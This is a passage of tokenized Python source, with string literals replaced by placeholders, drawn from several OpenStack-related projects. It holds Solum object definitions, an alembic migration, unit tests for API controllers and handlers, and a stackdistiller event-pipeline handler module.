. Session ( auth = auth , verify = self . verify ) <EOL> return barbicanclient . Client ( session = sess ) </s>
<s> from solum . objects import base <EOL> class Pipeline ( base . CrudMixin ) : <EOL> VERSION = '<STR_LIT:1.0>' <EOL> class PipelineList ( list , base . CrudListMixin ) : <EOL> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> from alembic import op <EOL> import sqlalchemy as sa <EOL> revision = '<STR_LIT>' <EOL> down_revision = '<STR_LIT>' <EOL> def upgrade ( ) : <EOL> op . alter_column ( '<STR_LIT:image>' , '<STR_LIT>' , <EOL> type_ = sa . String ( length = <NUM_LIT:100> ) , <EOL> existing_type = sa . String ( length = <NUM_LIT> ) , <EOL> existing_nullable = True , <EOL> ) <EOL> def downgrade ( ) : <EOL> op . alter_column ( '<STR_LIT:image>' , '<STR_LIT>' , <EOL> type_ = sa . String ( length = <NUM_LIT> ) , <EOL> existing_type = sa . String ( length = <NUM_LIT:100> ) , <EOL> existing_nullable = True , <EOL> ) </s>
<s> import json <EOL> import mock <EOL> from solum . api . controllers . camp . v1_1 import assemblies <EOL> from solum import objects <EOL> from solum . tests import base <EOL> from solum . tests import fakes <EOL> @ mock . patch ( '<STR_LIT>' , new_callable = fakes . FakePecanRequest ) <EOL> @ mock . patch ( '<STR_LIT>' , new_callable = fakes . FakePecanResponse ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> class TestAssemblies ( base . BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestAssemblies , self ) . setUp ( ) <EOL> objects . load ( ) <EOL> def test_assemblies_get ( self , PlanHandler , AssemblyHandler , resp_mock , <EOL> request_mock ) : <EOL> hand_get_all = AssemblyHandler . return_value . get_all <EOL> fake_assembly = fakes . FakeAssembly ( ) <EOL> hand_get_all . return_value = [ fake_assembly ] <EOL> resp = assemblies . AssembliesController ( ) . get ( ) <EOL> self . assertIsNotNone ( resp ) <EOL> self . assertEqual ( <NUM_LIT:200> , resp_mock . status ) <EOL> self . assertIsNotNone ( resp [ '<STR_LIT:result>' ] . assembly_links ) <EOL> assembly_links = resp [ '<STR_LIT:result>' ] . assembly_links <EOL> self . assertEqual ( <NUM_LIT:1> , len ( assembly_links ) ) <EOL> self . assertEqual ( fake_assembly . name , assembly_links [ <NUM_LIT:0> ] . target_name ) <EOL> def test_assemblies_post_no_content_type ( self , PlanHandler , <EOL> AssemblyHandler , resp_mock , <EOL> request_mock ) : <EOL> request_mock . content_type = None <EOL> assemblies . AssembliesController ( ) . post ( ) <EOL> self . assertEqual ( <NUM_LIT> , resp_mock . status ) <EOL> def test_assemblies_post_ref_none ( self , PlanHandler , AssemblyHandler , <EOL> resp_mock , request_mock ) : <EOL> request_mock . content_type = '<STR_LIT:application/json>' <EOL> request_mock . body = None <EOL> assemblies . AssembliesController ( ) . post ( ) <EOL> self . assertEqual ( <NUM_LIT> , resp_mock . 
status ) <EOL> def test_assemblies_post_ref_empty_json ( self , PlanHandler , AssemblyHandler , <EOL> resp_mock , request_mock ) : <EOL> request_mock . content_type = '<STR_LIT:application/json>' <EOL> request_mock . body = '<STR_LIT:{}>' <EOL> assemblies . AssembliesController ( ) . post ( ) <EOL> self . assertEqual ( <NUM_LIT> , resp_mock . status ) <EOL> def test_assemblies_post_ref_bad_rel_uri ( self , PlanHandler , <EOL> AssemblyHandler , resp_mock , <EOL> request_mock ) : <EOL> ref_object = { '<STR_LIT>' : <EOL> '<STR_LIT>' } <EOL> request_mock . content_type = '<STR_LIT:application/json>' <EOL> request_mock . body = json . dumps ( ref_object ) <EOL> assemblies . AssembliesController ( ) . post ( ) <EOL> self . assertEqual ( <NUM_LIT> , resp_mock . status ) <EOL> def test_assemblies_post_ref_rel_uris ( self , PlanHandler , AssemblyHandler , <EOL> resp_mock , request_mock ) : <EOL> hand_get = PlanHandler . return_value . get <EOL> hand_get . return_value = fakes . FakePlan ( ) <EOL> hand_create_from_plan = AssemblyHandler . return_value . create_from_plan <EOL> fake_assembly = fakes . FakeAssembly ( ) <EOL> hand_create_from_plan . return_value = fake_assembly <EOL> cntrl = assemblies . AssembliesController ( ) <EOL> ref_object = { '<STR_LIT>' : <EOL> '<STR_LIT>' } <EOL> request_mock . content_type = '<STR_LIT:application/json>' <EOL> request_mock . body = json . dumps ( ref_object ) <EOL> resp = cntrl . post ( ) <EOL> self . assertIsNotNone ( resp ) <EOL> self . assertEqual ( <NUM_LIT> , resp_mock . status ) <EOL> self . assertIsNotNone ( resp_mock . location ) <EOL> self . assertEqual ( fake_assembly . name , resp [ '<STR_LIT:name>' ] ) <EOL> ref_object = { '<STR_LIT>' : <EOL> '<STR_LIT>' } <EOL> request_mock . content_type = '<STR_LIT:application/json>' <EOL> request_mock . body = json . dumps ( ref_object ) <EOL> resp = cntrl . post ( ) <EOL> self . assertIsNotNone ( resp ) <EOL> self . assertEqual ( <NUM_LIT> , resp_mock . status ) <EOL> self . 
assertIsNotNone ( resp_mock . location ) <EOL> self . assertEqual ( fake_assembly . name , resp [ '<STR_LIT:name>' ] ) <EOL> ref_object = { '<STR_LIT>' : <EOL> '<STR_LIT>' } <EOL> request_mock . content_type = '<STR_LIT:application/json>' <EOL> request_mock . body = json . dumps ( ref_object ) <EOL> resp = cntrl . post ( ) <EOL> self . assertIsNotNone ( resp ) <EOL> self . assertEqual ( <NUM_LIT> , resp_mock . status ) <EOL> self . assertIsNotNone ( resp_mock . location ) <EOL> self . assertEqual ( fake_assembly . name , resp [ '<STR_LIT:name>' ] ) <EOL> ref_object = { '<STR_LIT>' : <EOL> '<STR_LIT>' } <EOL> request_mock . content_type = '<STR_LIT:application/json>' <EOL> request_mock . body = json . dumps ( ref_object ) <EOL> resp = cntrl . post ( ) <EOL> self . assertIsNotNone ( resp ) <EOL> self . assertEqual ( <NUM_LIT> , resp_mock . status ) <EOL> self . assertIsNotNone ( resp_mock . location ) <EOL> self . assertEqual ( fake_assembly . name , resp [ '<STR_LIT:name>' ] ) </s>
<s> import json <EOL> import mock <EOL> from solum . api . handlers import infrastructure_handler as infra <EOL> from solum . tests import base <EOL> from solum . tests import fakes <EOL> from solum . tests import utils <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> class TestInfrastructureStackHandler ( base . BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestInfrastructureStackHandler , self ) . setUp ( ) <EOL> self . ctx = utils . dummy_context ( ) <EOL> def test_get ( self , mock_registry ) : <EOL> mock_registry . InfrastructureStack . get_by_uuid . return_value = { } <EOL> handler = infra . InfrastructureStackHandler ( self . ctx ) <EOL> res = handler . get ( '<STR_LIT>' ) <EOL> self . assertIsNotNone ( res ) <EOL> mock_registry . InfrastructureStack . get_by_uuid . assert_called_once_with ( <EOL> self . ctx , '<STR_LIT>' ) <EOL> def test_get_all ( self , mock_registry ) : <EOL> mock_registry . StackList . get_all . return_value = { } <EOL> handler = infra . InfrastructureStackHandler ( self . ctx ) <EOL> res = handler . get_all ( ) <EOL> self . assertIsNotNone ( res ) <EOL> mock_registry . InfrastructureStackList . get_all . assert_called_once_with ( <EOL> self . ctx ) <EOL> def test_update ( self , mock_reg ) : <EOL> data = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> handler = infra . InfrastructureStackHandler ( self . ctx ) <EOL> handler . update ( '<STR_LIT>' , data ) <EOL> mock_reg . InfrastructureStack . update_and_save . assert_called_once_with ( <EOL> self . ctx , '<STR_LIT>' , data ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_create ( self , mock_get , mock_clients , mock_registry ) : <EOL> data = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> db_obj = fakes . FakeInfrastructureStack ( ) <EOL> fake_template = json . dumps ( { '<STR_LIT:description>' : '<STR_LIT:test>' } ) <EOL> mock_get . 
return_value = fake_template <EOL> parameters = { '<STR_LIT:image>' : '<STR_LIT>' } <EOL> mock_registry . InfrastructureStack . return_value = db_obj <EOL> mock_create = mock_clients . return_value . heat . return_value . stacks . create <EOL> mock_create . return_value = { "<STR_LIT>" : { "<STR_LIT:id>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ { "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } ] } } <EOL> mock_queue = mock_clients . return_value . zaqar . return_value . queue <EOL> handler = infra . InfrastructureStackHandler ( self . ctx ) <EOL> res = handler . create ( data ) <EOL> db_obj . update . assert_called_once_with ( data ) <EOL> db_obj . create . assert_called_once_with ( self . ctx ) <EOL> self . assertEqual ( db_obj , res ) <EOL> mock_create . assert_called_once_with ( stack_name = '<STR_LIT>' , <EOL> template = fake_template , <EOL> parameters = parameters ) <EOL> mock_queue . assert_called_once_with ( db_obj . uuid ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_create_zaqar_queue ( self , mock_clients , mock_registry ) : <EOL> queue_name = '<STR_LIT:test>' <EOL> mock_queue = mock_clients . return_value . zaqar . return_value . queue <EOL> handler = infra . InfrastructureStackHandler ( self . ctx ) <EOL> handler . _create_zaqar_queue ( queue_name ) <EOL> mock_queue . assert_called_once_with ( queue_name ) <EOL> def test_delete ( self , mock_registry ) : <EOL> db_obj = fakes . FakeInfrastructureStack ( ) <EOL> mock_registry . InfrastructureStack . get_by_uuid . return_value = db_obj <EOL> handler = infra . InfrastructureStackHandler ( self . ctx ) <EOL> handler . delete ( '<STR_LIT>' ) <EOL> db_obj . destroy . assert_called_once_with ( self . ctx ) <EOL> mock_registry . InfrastructureStack . get_by_uuid . assert_called_once_with ( <EOL> self . ctx , '<STR_LIT>' ) </s>
<s> from solum . objects import registry <EOL> from solum . objects . sqlalchemy import app <EOL> from solum . tests import base <EOL> from solum . tests import utils <EOL> class TestApp ( base . BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestApp , self ) . setUp ( ) <EOL> self . db = self . useFixture ( utils . Database ( ) ) <EOL> self . ctx = utils . dummy_context ( ) <EOL> self . data = [ { '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . ctx . tenant , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> } ] <EOL> utils . create_models_from_data ( app . App , self . data , self . ctx ) <EOL> def test_objects_registered ( self ) : <EOL> self . assertTrue ( registry . App ) <EOL> self . assertTrue ( registry . AppList ) <EOL> def test_get_all ( self ) : <EOL> lst = app . AppList ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( lst . get_all ( self . ctx ) ) ) <EOL> def test_check_data_by_id ( self ) : <EOL> foundapp = app . App ( ) . get_by_id ( self . ctx , self . data [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] ) <EOL> for key , value in self . data [ <NUM_LIT:0> ] . items ( ) : <EOL> self . assertEqual ( value , getattr ( foundapp , key ) ) <EOL> def test_check_data_by_uuid ( self ) : <EOL> foundapp = app . App ( ) . get_by_uuid ( self . ctx , self . data [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] ) <EOL> for key , value in self . data [ <NUM_LIT:0> ] . items ( ) : <EOL> self . assertEqual ( value , getattr ( foundapp , key ) ) </s>
<s> import pbr . version <EOL> version_info = pbr . version . VersionInfo ( '<STR_LIT>' ) <EOL> version_string = version_info . version_string </s>
<s> """<STR_LIT>""" <EOL> import argparse <EOL> import json <EOL> import sys <EOL> from stackdistiller import condenser <EOL> from stackdistiller import distiller <EOL> class TestCondenser ( condenser . CondenserBase ) : <EOL> def __init__ ( self ) : <EOL> self . clear ( ) <EOL> def add_trait ( self , name , trait_type , value ) : <EOL> self . traits . append ( distiller . Trait ( name , trait_type , value ) ) <EOL> def add_envelope_info ( self , event_type , message_id , when ) : <EOL> self . event_type = event_type <EOL> self . message_id = message_id <EOL> self . when = when <EOL> def get_event ( self ) : <EOL> return self <EOL> def clear ( self ) : <EOL> self . event_type = None <EOL> self . message_id = None <EOL> self . when = None <EOL> self . traits = [ ] <EOL> def __str__ ( self ) : <EOL> text = [ "<STR_LIT>" % ( self . event_type , <EOL> self . message_id , <EOL> self . when ) ] <EOL> for trait in sorted ( self . traits ) : <EOL> text . append ( "<STR_LIT>" % trait ) <EOL> text . append ( '<STR_LIT>' ) <EOL> return "<STR_LIT:\n>" . join ( text ) <EOL> def test_data ( args ) : <EOL> if not args . test_data : <EOL> n = json . load ( sys . stdin ) <EOL> if args . list : <EOL> for notif in n : <EOL> yield notif <EOL> else : <EOL> yield n <EOL> else : <EOL> for f in args . test_data : <EOL> with open ( f , '<STR_LIT:r>' ) as data : <EOL> n = json . load ( data ) <EOL> if args . list : <EOL> for notif in n : <EOL> yield notif <EOL> else : <EOL> yield n <EOL> parser = argparse . ArgumentParser ( <EOL> description = "<STR_LIT>" ) <EOL> parser . add_argument ( <EOL> '<STR_LIT:-c>' , '<STR_LIT>' , <EOL> default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . 
add_argument ( <EOL> '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , type = argparse . FileType ( '<STR_LIT:w>' ) , <EOL> default = sys . stdout , help = "<STR_LIT>" ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , nargs = '<STR_LIT:*>' , metavar = '<STR_LIT>' , <EOL> help = "<STR_LIT>" ) <EOL> args = parser . parse_args ( ) <EOL> config = distiller . load_config ( args . config ) <EOL> out = args . output <EOL> out . write ( "<STR_LIT>" % args . config ) <EOL> notifications = test_data ( args ) <EOL> dist = distiller . Distiller ( config , catchall = args . add_default_definition ) <EOL> nct = <NUM_LIT:0> <EOL> drops = <NUM_LIT:0> <EOL> cond = TestCondenser ( ) <EOL> for notification in notifications : <EOL> cond . clear ( ) <EOL> nct += <NUM_LIT:1> <EOL> if dist . to_event ( notification , cond ) is None : <EOL> out . write ( "<STR_LIT>" % <EOL> notification [ '<STR_LIT>' ] ) <EOL> drops += <NUM_LIT:1> <EOL> else : <EOL> event = cond . get_event ( ) <EOL> out . write ( str ( event ) ) <EOL> out . write ( "<STR_LIT>" ) <EOL> out . write ( "<STR_LIT>" % ( nct , drops ) ) </s>
<s> import abc <EOL> import collections <EOL> import datetime <EOL> import fnmatch <EOL> import json <EOL> import logging <EOL> import six <EOL> import time <EOL> import uuid <EOL> from notabene import kombu_driver as driver <EOL> import requests <EOL> logger = logging . getLogger ( __name__ ) <EOL> @ six . add_metaclass ( abc . ABCMeta ) <EOL> class PipelineHandlerBase ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kw ) : <EOL> """<STR_LIT>""" <EOL> @ abc . abstractmethod <EOL> def handle_events ( self , events , env ) : <EOL> """<STR_LIT>""" <EOL> @ abc . abstractmethod <EOL> def commit ( self ) : <EOL> """<STR_LIT>""" <EOL> @ abc . abstractmethod <EOL> def rollback ( self ) : <EOL> """<STR_LIT>""" <EOL> class LoggingHandler ( PipelineHandlerBase ) : <EOL> def handle_events ( self , events , env ) : <EOL> emsg = '<STR_LIT:U+002CU+0020>' . join ( "<STR_LIT>" % ( event [ '<STR_LIT>' ] , event [ '<STR_LIT>' ] ) <EOL> for event in events ) <EOL> logger . info ( "<STR_LIT>" % ( len ( events ) , emsg ) ) <EOL> return events <EOL> def commit ( self ) : <EOL> pass <EOL> def rollback ( self ) : <EOL> pass <EOL> class NotabeneException ( Exception ) : <EOL> pass <EOL> class ConnectionManager ( object ) : <EOL> def __init__ ( self ) : <EOL> self . pool = { } <EOL> def _extract_params ( self , kw ) : <EOL> host = kw . get ( '<STR_LIT:host>' , '<STR_LIT:localhost>' ) <EOL> user = kw . get ( '<STR_LIT:user>' , '<STR_LIT>' ) <EOL> password = kw . get ( '<STR_LIT:password>' , '<STR_LIT>' ) <EOL> port = kw . get ( '<STR_LIT:port>' , <NUM_LIT> ) <EOL> vhost = kw . get ( '<STR_LIT>' , '<STR_LIT:/>' ) <EOL> library = kw . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> exchange_name = kw . get ( '<STR_LIT>' ) <EOL> exchange_type = kw . 
get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if exchange_name is None : <EOL> raise NotabeneException ( "<STR_LIT>" ) <EOL> connection_dict = { '<STR_LIT:host>' : host , '<STR_LIT:port>' : port , <EOL> '<STR_LIT:user>' : user , '<STR_LIT:password>' : password , <EOL> '<STR_LIT>' : library , '<STR_LIT>' : vhost } <EOL> connection_tuple = tuple ( sorted ( connection_dict . items ( ) ) ) <EOL> exchange_dict = { '<STR_LIT>' : exchange_name , <EOL> '<STR_LIT>' : exchange_type } <EOL> exchange_tuple = tuple ( sorted ( exchange_dict . items ( ) ) ) <EOL> return ( connection_dict , connection_tuple , <EOL> exchange_dict , exchange_tuple ) <EOL> def get_connection ( self , properties , queue_name ) : <EOL> ( connection_dict , connection_tuple , <EOL> exchange_dict , exchange_tuple ) = self . _extract_params ( properties ) <EOL> connection_info = self . pool . get ( connection_tuple ) <EOL> if connection_info is None : <EOL> connection = driver . create_connection ( connection_dict [ '<STR_LIT:host>' ] , <EOL> connection_dict [ '<STR_LIT:port>' ] , <EOL> connection_dict [ '<STR_LIT:user>' ] , <EOL> connection_dict [ '<STR_LIT:password>' ] , <EOL> connection_dict [ '<STR_LIT>' ] , <EOL> connection_dict [ '<STR_LIT>' ] ) <EOL> connection_info = ( connection , { } ) <EOL> self . pool [ connection_tuple ] = connection_info <EOL> connection , exchange_pool = connection_info <EOL> exchange = exchange_pool . get ( exchange_tuple ) <EOL> if exchange is None : <EOL> exchange = driver . create_exchange ( exchange_dict [ '<STR_LIT>' ] , <EOL> exchange_dict [ '<STR_LIT>' ] ) <EOL> exchange_pool [ exchange_tuple ] = exchange <EOL> queue = driver . create_queue ( queue_name , exchange , queue_name , <EOL> channel = connection . channel ( ) ) <EOL> queue . declare ( ) <EOL> return ( connection , exchange ) <EOL> connection_manager = ConnectionManager ( ) <EOL> class NotabeneHandler ( PipelineHandlerBase ) : <EOL> def __init__ ( self , ** kw ) : <EOL> super ( NotabeneHandler , self ) . 
__init__ ( ** kw ) <EOL> global connection_manager <EOL> self . queue_name = kw . get ( '<STR_LIT>' ) <EOL> if self . queue_name is None : <EOL> raise NotabeneException ( "<STR_LIT>" ) <EOL> self . connection , self . exchange = connection_manager . get_connection ( <EOL> kw , self . queue_name ) <EOL> self . env_keys = kw . get ( '<STR_LIT>' , [ ] ) <EOL> def handle_events ( self , events , env ) : <EOL> keys = [ key for key in self . env_keys ] <EOL> self . pending_notifications = [ ] <EOL> for key in keys : <EOL> self . pending_notifications . extend ( env . get ( key , [ ] ) ) <EOL> return events <EOL> def commit ( self ) : <EOL> for notification in self . pending_notifications : <EOL> logger . info ( "<STR_LIT>" % <EOL> ( notification [ '<STR_LIT>' ] , self . exchange , <EOL> self . queue_name ) ) <EOL> try : <EOL> driver . send_notification ( notification , self . queue_name , <EOL> self . connection , self . exchange ) <EOL> except Exception as e : <EOL> logger . exception ( e ) <EOL> def rollback ( self ) : <EOL> pass <EOL> class UsageException ( Exception ) : <EOL> def __init__ ( self , code , message ) : <EOL> super ( UsageException , self ) . __init__ ( message ) <EOL> self . code = code <EOL> class UsageHandler ( PipelineHandlerBase ) : <EOL> def __init__ ( self , ** kw ) : <EOL> super ( UsageHandler , self ) . __init__ ( ** kw ) <EOL> self . warnings = [ ] <EOL> def _get_audit_period ( self , event ) : <EOL> apb = event . get ( '<STR_LIT>' ) <EOL> ape = event . get ( '<STR_LIT>' ) <EOL> return apb , ape <EOL> def _is_exists ( self , event ) : <EOL> return event [ '<STR_LIT>' ] == '<STR_LIT>' <EOL> def _is_non_EOD_exists ( self , event ) : <EOL> apb , ape = self . _get_audit_period ( event ) <EOL> return ( self . _is_exists ( event ) and apb and ape <EOL> and ape . date ( ) != ( apb . date ( ) + datetime . timedelta ( days = <NUM_LIT:1> ) ) ) <EOL> def _is_EOD_exists ( self , event ) : <EOL> apb , ape = self . 
_get_audit_period ( event ) <EOL> return ( self . _is_exists ( event ) and apb and ape <EOL> and apb . time ( ) == datetime . time ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> and ape . time ( ) == datetime . time ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> and ape . date ( ) == ( apb . date ( ) + datetime . timedelta ( days = <NUM_LIT:1> ) ) ) <EOL> def _extract_launched_at ( self , exists ) : <EOL> if not exists . get ( '<STR_LIT>' ) : <EOL> raise UsageException ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> return exists [ '<STR_LIT>' ] <EOL> def _extract_interesting_events ( self , events , interesting ) : <EOL> return [ event for event in events <EOL> if event [ '<STR_LIT>' ] in interesting ] <EOL> def _find_deleted_events ( self , events ) : <EOL> interesting = [ '<STR_LIT>' ] <EOL> return self . _extract_interesting_events ( events , interesting ) <EOL> def _verify_fields ( self , this , that , fields ) : <EOL> for field in fields : <EOL> if field not in this and field not in that : <EOL> continue <EOL> if this [ field ] != that [ field ] : <EOL> raise UsageException ( "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> % ( field , this [ field ] , that [ field ] ) ) <EOL> def _confirm_delete ( self , exists , delete_events , fields ) : <EOL> deleted_at = exists . get ( '<STR_LIT>' ) <EOL> state = exists . get ( '<STR_LIT:state>' ) <EOL> apb , ape = self . _get_audit_period ( exists ) <EOL> if not deleted_at and delete_events : <EOL> raise UsageException ( "<STR_LIT>" , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if deleted_at and state != "<STR_LIT>" : <EOL> raise UsageException ( "<STR_LIT>" , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if deleted_at and not delete_events : <EOL> launched_at = exists . 
get ( '<STR_LIT>' ) <EOL> if deleted_at < launched_at : <EOL> raise UsageException ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> if ( apb and ape and deleted_at >= apb and deleted_at <= ape ) : <EOL> raise UsageException ( "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if len ( delete_events ) > <NUM_LIT:1> : <EOL> raise UsageException ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if delete_events : <EOL> self . _verify_fields ( exists , delete_events [ - <NUM_LIT:1> ] , fields ) <EOL> def _confirm_launched_at ( self , block , exists ) : <EOL> if exists . get ( '<STR_LIT:state>' ) != '<STR_LIT>' : <EOL> return <EOL> apb , ape = self . _get_audit_period ( exists ) <EOL> launched_at = self . _extract_launched_at ( exists ) <EOL> if apb and ape and apb <= launched_at <= ape and len ( block ) == <NUM_LIT:0> : <EOL> raise UsageException ( "<STR_LIT>" , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def _get_core_fields ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def _do_checks ( self , block , exists ) : <EOL> interesting = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> self . _confirm_launched_at ( block , exists ) <EOL> fields = self . _get_core_fields ( ) <EOL> last_interesting = None <EOL> for event in block : <EOL> if event [ '<STR_LIT>' ] in interesting : <EOL> last_interesting = event <EOL> if last_interesting : <EOL> self . _verify_fields ( last_interesting , exists , fields ) <EOL> elif self . _is_non_EOD_exists ( exists ) : <EOL> self . warnings . append ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> exists [ '<STR_LIT>' ] ) <EOL> deleted = self . _find_deleted_events ( block ) <EOL> delete_fields = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . _confirm_delete ( exists , deleted , delete_fields ) <EOL> def _base_notification ( self , exists ) : <EOL> basen = exists . 
copy ( ) <EOL> if '<STR_LIT>' not in basen : <EOL> basen [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> if '<STR_LIT>' not in basen : <EOL> basen [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> if '<STR_LIT>' not in basen : <EOL> basen [ '<STR_LIT>' ] = '<STR_LIT:0>' <EOL> basen [ '<STR_LIT>' ] = exists . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return basen <EOL> def _generate_new_id ( self , original_message_id , event_type ) : <EOL> if original_message_id : <EOL> oid = uuid . UUID ( original_message_id ) <EOL> return uuid . uuid5 ( oid , event_type ) <EOL> else : <EOL> logger . error ( "<STR_LIT>" <EOL> "<STR_LIT>" % event_type ) <EOL> return uuid . uuid4 ( ) <EOL> def _process_block ( self , block , exists ) : <EOL> error = None <EOL> try : <EOL> self . _do_checks ( block , exists ) <EOL> event_type = "<STR_LIT>" <EOL> except UsageException as e : <EOL> error = e <EOL> event_type = "<STR_LIT>" <EOL> logger . warn ( "<STR_LIT>" % <EOL> ( self . stream_id , e . code , e ) ) <EOL> apb , ape = self . _get_audit_period ( exists ) <EOL> logger . warn ( "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( self . stream_id , exists . get ( "<STR_LIT>" ) , <EOL> exists . get ( "<STR_LIT>" ) , exists . get ( "<STR_LIT:state>" ) , <EOL> apb , ape , len ( block ) ) ) <EOL> if len ( block ) > <NUM_LIT:1> : <EOL> logger . warn ( "<STR_LIT>" <EOL> % ( event_type , self . stream_id ) ) <EOL> for event in block : <EOL> logger . warn ( "<STR_LIT>" % <EOL> ( event [ '<STR_LIT>' ] , event [ '<STR_LIT>' ] ) ) <EOL> events = [ ] <EOL> if self . warnings : <EOL> instance_id = exists . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> warning_event = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : str ( uuid . uuid4 ( ) ) , <EOL> '<STR_LIT>' : exists . get ( <EOL> '<STR_LIT>' , <EOL> datetime . datetime . utcnow ( ) ) , <EOL> '<STR_LIT>' : int ( self . stream_id ) , <EOL> '<STR_LIT>' : instance_id , <EOL> '<STR_LIT>' : '<STR_LIT:U+002CU+0020>' . join ( self . warnings ) } <EOL> events . 
append ( warning_event ) <EOL> new_event = self . _base_notification ( exists ) <EOL> new_event [ '<STR_LIT>' ] = self . _generate_new_id ( <EOL> new_event [ '<STR_LIT>' ] , event_type ) <EOL> new_event . update ( { '<STR_LIT>' : event_type , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : exists . get ( '<STR_LIT>' , <EOL> datetime . datetime . utcnow ( ) ) , <EOL> '<STR_LIT>' : int ( self . stream_id ) , <EOL> '<STR_LIT:error>' : str ( error ) , <EOL> '<STR_LIT>' : error and error . code } ) <EOL> events . append ( new_event ) <EOL> return events <EOL> def handle_events ( self , events , env ) : <EOL> self . env = env <EOL> self . stream_id = env [ '<STR_LIT>' ] <EOL> self . warnings = [ ] <EOL> new_events = [ ] <EOL> block = [ ] <EOL> for event in events : <EOL> if self . _is_exists ( event ) : <EOL> new_events . extend ( self . _process_block ( block , event ) ) <EOL> block = [ ] <EOL> else : <EOL> block . append ( event ) <EOL> if block : <EOL> new_event = { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : str ( uuid . uuid4 ( ) ) , <EOL> '<STR_LIT>' : block [ <NUM_LIT:0> ] . get ( '<STR_LIT>' , <EOL> datetime . datetime . utcnow ( ) ) , <EOL> '<STR_LIT>' : int ( self . stream_id ) , <EOL> '<STR_LIT>' : block [ <NUM_LIT:0> ] . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT:error>' : "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' : "<STR_LIT>" <EOL> } <EOL> new_events . 
append ( new_event ) <EOL> return events + new_events <EOL> def commit ( self ) : <EOL> pass <EOL> def rollback ( self ) : <EOL> pass <EOL> class AtomPubException ( Exception ) : <EOL> pass <EOL> cuf_template = ( """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" ) <EOL> class AtomPubHandler ( PipelineHandlerBase ) : <EOL> auth_token_cache = None <EOL> def __init__ ( self , url , event_types = None , extra_info = None , <EOL> content_format = '<STR_LIT>' , title = None , categories = None , <EOL> auth_user = '<STR_LIT>' , auth_key = '<STR_LIT>' , auth_server = '<STR_LIT>' , <EOL> wait_interval = <NUM_LIT:30> , max_wait = <NUM_LIT> , http_timeout = <NUM_LIT> , ** kw ) : <EOL> super ( AtomPubHandler , self ) . __init__ ( ** kw ) <EOL> self . events = 